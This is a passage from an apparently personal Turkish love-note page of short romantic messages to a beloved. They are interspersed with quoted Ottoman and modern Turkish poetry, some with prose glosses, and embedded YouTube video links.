\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::D9A6zrFojj8[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSaat, 3 olsun diye can atadursun, bug\u00fcn buradan sesleneyim olur mu efendim?\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\"K\u0131zmay\u0131n \ud83d\udc40\" ifafesi \u015fakadan ba\u015fka nedir ki? Yeri geldi\u011finde k\u0131z\u0131n, ka\u015f \u00e7at\u0131n efendim. Ama biliniz ki e\u011fer bir an hata etti\u011fi olursa bile isteye hataya d\u00fc\u015fmemi\u015ftir bu Pervane.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNecati Beg nas\u0131l da hakl\u0131s\u0131n sab\u00e2dan hesab\u0131n\u0131 sormal\u0131. \n\n_Ey sab\u00e2 yabanda m\u0131 buldun aya\u011f\u0131 topra\u011f\u0131n_ +\n_Her g\u00f6ze ol t\u00fbty\u00e2y\u0131 r\u00e2yeg\u00e2n vermek neden_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nCan\u0131m efendim\n\nvideo::2hq8rHNsxfw[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_M\u00fcbtel\u00e2_ kelimesi nas\u0131l ge\u00e7iyordu? Anlam\u0131 i\u00e7in s\u00f6zl\u00fckleri kar\u0131\u015ft\u0131rmaya ne hacet, bu acize bak\u0131p g\u00f6rmek varken. \n\nvideo::Ebvr2nFovCM[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::hcRl8wsIlAs[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPeki, olur efendim. Yani in\u015fallah :))\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n \nFuzuli ilk m\u0131sray\u0131 bana bak\u0131p yazm\u0131\u015f onu anlad\u0131m lakin ikinci m\u0131sra size midir acaba? \ud83d\udc40 \n\n_\"Olmad\u0131 ol m\u00e2ha r\u00fb\u015fen yandu\u011fum hicr\u00e2n g\u00fcn\u00fc_ +\n_Yandu\u011fun \u015feb t\u00e2 seher \u015fem'\u00fcn ne bils\u00fcn \u00e2fit\u00e2b_ +\n\n(Ayr\u0131l\u0131k g\u00fcn\u00fc yand\u0131\u011f\u0131mdan o ay gibi g\u00fczel haberd\u00e2r olmad\u0131, yani bu hadise ona ayd\u0131nlanmad\u0131. Mumun gece sabaha kadar yand\u0131\u011f\u0131n\u0131 g\u00fcne\u015f ne bilsin.)\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nKalem olsayd\u0131m efendim eliniz de\u011ferdi, ka\u011f\u0131t olsayd\u0131m efendim y\u00fcz\u00fcn\u00fcz bana d\u00f6nerdi. Heyhat insan olup Yemen'de kalm\u0131\u015f\u0131m. Yemen'deki de yan\u0131n\u0131zdad\u0131r \u00f6yle ya, az kals\u0131n unutup \u00fcz\u00fclecektim. +\n\nSiz yan\u0131mdas\u0131n\u0131z her an her vakit.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00fcn boyunca ka\u00e7 kere demek istedim, yutkundum. Hem bu kadar isteyip hem de bu kadar s\u00f6ylemekten \u00e7ekinmek garip. S\u00f6ylemek istedi\u011fim c\u00fcmleyi zaten biliyorsunuz \ud83d\udc40 \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_..._ +\n_yanl\u0131\u015f anla\u015f\u0131lmas\u0131 muhtemel, kald\u0131r\u0131ld\u0131 :) _ +\n_..._\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi ki vars\u0131n\u0131z efendim. Yaz\u0131y\u0131 g\u00f6rd\u00fc\u011f\u00fcn\u00fczde g\u00fcl\u00fcms\u00fcyorumdur size do\u011fru. \ud83d\ude0c\ud83d\ude0c \n\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\"Can\u0131m efendim\", ay y\u00fczl\u00fc g\u00fcl y\u00fczl\u00fc efendim... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nLaleler a\u00e7t\u0131\n\nvideo::vMbjeQl_FdY[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBa\u015fka bir sesten tekrar etsek \ud83d\udc40 \n\n_Aman aman aman aaah gel yan\u0131ma_ +\n_Ahu g\u00f6zl\u00fcm \u015firin s\u00f6zl\u00fcm_ +\n_Aaaaah k\u0131z\u0131l han\u00e7erim_ +\n_\u00c7a\u011f\u0131r can\u0131ma aks\u0131n kan\u0131m_ +\n_Kurbanam o cana men_ +\n_Aaaaah_\n\nvideo::Y6vbfX0i5Hw[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::vg8WGEr-dPU[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Ya Rab sevdi\u011fimle beraber eyle_ +\n_G\u00f6nl\u00fcm\u00fc c\u00e2n\u0131m\u0131 her bir \u00e2n\u0131m\u0131_\n\nAmin amin amin...\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Hep sen vars\u0131n\"_ \ud83d\udc95 \n\nvideo::VXNISYc8uNI[youtube]\n\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\ud83c\udf37\ud83c\udf37 \n\nvideo::74R3ku58-t0[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::jSdJ7gr1-IE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"A\u015fk-\u0131 p\u00e2k\u00fcn gam\u0131yla \u015f\u00e2d eyle_ +\n_Y\u00e2r vasl\u0131yla ber-murad eyle\"_ \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\nvideo::fdv_Bki-2aI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSiz rahats\u0131z etti\u011finizi san\u0131yorsunuz, bense derdini benle payla\u015facak kadar de\u011fer veriyor bana deyip mutlu oluyorum. Dert y\u00fcz\u00fc g\u00f6rmeyin, g\u00f6recek olursan\u0131z -hay\u0131r, hay\u0131r olursan\u0131z de\u011fil- olursak yan\u0131n\u0131zday\u0131m. Dert orta\u011f\u0131n\u0131z, s\u0131rda\u015f\u0131n\u0131z, refikiniz olabilsem ne b\u00fcy\u00fck bahtiyarl\u0131k...\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBuras\u0131 bir m\u00fcddet \u00f6ks\u00fcz kald\u0131. \n\nAbdurrahim Karako\u00e7 Beyefendi kimin i\u00e7in s\u00f6yledi bilmiyorum ama ben s\u00f6ylersem kim oldu\u011fu bellidir :)\n\n_\"A\u015fktan yana s\u00f6z duyunca_ +\n_Ben hep seni d\u00fc\u015f\u00fcn\u00fcr\u00fcm._ +\n_U\u00e7suz hayaller boyunca_ +\n_Ben hep seni d\u00fc\u015f\u00fcn\u00fcr\u00fcm.\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNedim ne g\u00fczel demi\u015f...\n\n_\"Sevdi\u011fim cem\u00e2lin \u00e7\u00fcnkim g\u00f6remem_ +\n_\u00c7\u0131kmas\u0131n hay\u00e2lin dil-i \u015feyd\u00e2dan_ +\n_H\u00e2k-i p\u00e2ye \u00e7\u00fcnki y\u00fczler s\u00fcremem_ +\n_Alay\u0131m pey\u00e2m\u0131n b\u00e2d-\u0131 sab\u00e2dan\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\u2764\ufe0f\n\nvideo::6CmU7vvmVxw[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_G\u00f6nl\u00fcm senin esirin, kalbim senin yerindir_\n\nvideo::s2KQlEfbeRI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::cDIkxp44qak[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir de \u00f6zlem var. Sanki bu duygu beni hi\u00e7 terketmeyecek. +\n\u00c7ok \u00f6zledim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00f6nl\u00fcme nak\u015fedilen foto\u011fraf\u0131 hi\u00e7 silmedim. T\u00fcm foto\u011fraflardan g\u00fczel o. +\n\nBen de derim ne demi\u015fse Bekir Bey.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Nesin a sen a g\u00fczel_\n\nvideo::vweKToC3gu0[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_D\u00fbr etme yan\u0131ndan asla bendeni ey k\u00e2\u015f-\u0131 keman_\n\nvideo::mmbPHRfJsOg[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNe kadar da g\u00fczel de\u011fil mi? +\n\u00c7\u00fcnk\u00fc O bunu be\u011feniyormu\u015f.\n\nvideo::ml0yoRT_e2c[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nGarip bir h\u00fcz\u00fcn var bu \u015fark\u0131da sizi al\u0131p getiren\n\nvideo::Qprmq3Ol27A[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi ki vars\u0131n\u0131z. Vars\u0131n\u0131z ya bu garip bir liman buldu u\u00e7suz bucaks\u0131z bu ummanda \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir tanesiniz siz bir tane... Yan\u0131mda oldu\u011funuzu bileyim, ayn\u0131 hayali kurdu\u011fumuzu bileyim beklerim. \ud83d\udc90\ud83d\udc90\ud83d\udc90 \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHer\u015feye de c\u0131k \ud83d\ude00 \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir yuva hayal ediyorum.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130n\u015fallah bir yol bulunur diye hep \u00fcmit ediyorum. \u00dcmit de bir \u00e7e\u015fit duad\u0131r. Sen, ben, ailelerimiz kimse \u00fcz\u00fclmesin, zorda kalmas\u0131n :)\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNe g\u00fczel seni s\u00f6ylemek \u00e7i\u00e7eklere. Ne g\u00fczel senden konu\u015fmak. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\ud83d\udc30\ud83d\udc10 \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBedenim, ruhum ve \u00f6mr\u00fcm senin ellerinde. Nas\u0131l dilersen \u00f6yle kullanabilirsin. Ben sultan\u0131m\u0131n bendesiyim. Bo\u015funa de\u011fil bilakis sevgine lay\u0131k olabilmek i\u00e7in bir f\u0131rsat.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNe g\u00fczel bir g\u00fcnd\u00fc, \u00e7ok g\u00fczel bir an\u0131. Paha bi\u00e7ilmez bir yorgunluk. Hepsi i\u00e7in ne kadar te\u015fekk\u00fcr edeyim? G\u00fcl\u00fcmsemeni g\u00f6rme bahtiyarl\u0131\u011f\u0131na te\u015fekk\u00fcrler kafi gelmez. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHala otob\u00fcs\u00fcn cam\u0131na bak\u0131yorum, g\u00fcl\u00fcms\u00fcyorsun. G\u00fcller a\u00e7\u0131yor g\u00fcl y\u00fcz\u00fcn. \n\n_\"Ne \u00e7\u00e2re var ki fir\u00e2kunla eglenem bir dem_ +\n_Ne t\u00e2li\u2019\u00fcm meded eyler vis\u00e2le f\u0131rsat olur\"_ +\n(Nef'\u00ee)\n\n_(Ne senin ayr\u0131l\u0131\u011f\u0131n y\u00fcz\u00fcnden bir an oturup kalman\u0131n \u00e7aresi var ne de talihim yard\u0131m eder de sana kavu\u015fma f\u0131rsat\u0131 bulabilirim.)_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBen hala otob\u00fcs\u00fcn cam\u0131n\u0131 g\u00f6zetliyorum.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYarimin kokusunu r\u00fczgar\u0131nda saklayan \u015fehir, senden o kokuyu almaya geldim. Nefes nefes havandan \u00e7ekerek... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSanki iki \u015fehirden ayr\u0131l\u0131yorum. \u0130ki \u00f6zlemi s\u0131\u011fd\u0131raca\u011f\u0131m y\u00fcre\u011fime. \n\nVe hi\u00e7 unutma olur mu, seni seviyorum.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\"H\u0131 h\u0131\" \ud83d\udc95 \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00fczel, ne g\u00fczel olmu\u015fsun\n\nvideo::z7BFOVzLM8M[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nVarsam Ta\u015fhan'a izini arasam, Ali Pa\u015fa'ya var\u0131p bir yol soluklansam, Behzat boyu ad\u0131mlasam, Ball\u0131ca'ya yol d\u00fc\u015f\u00fcr\u00fcp nefeslensem, \u00c7ekenli'de yolunu g\u00f6zlesem bulur muyum seni sultan\u0131m? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eirin k\u0131z, sana iyi bir e\u015f olman\u0131n hayali -belki de umudu- beni b\u00f6ylesine din\u00e7 tutan.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00c7ok \u00f6zledim seni. \u0130nsan en yak\u0131n\u0131nda hissetti\u011finin \u00f6zlemini daha \u00e7ok 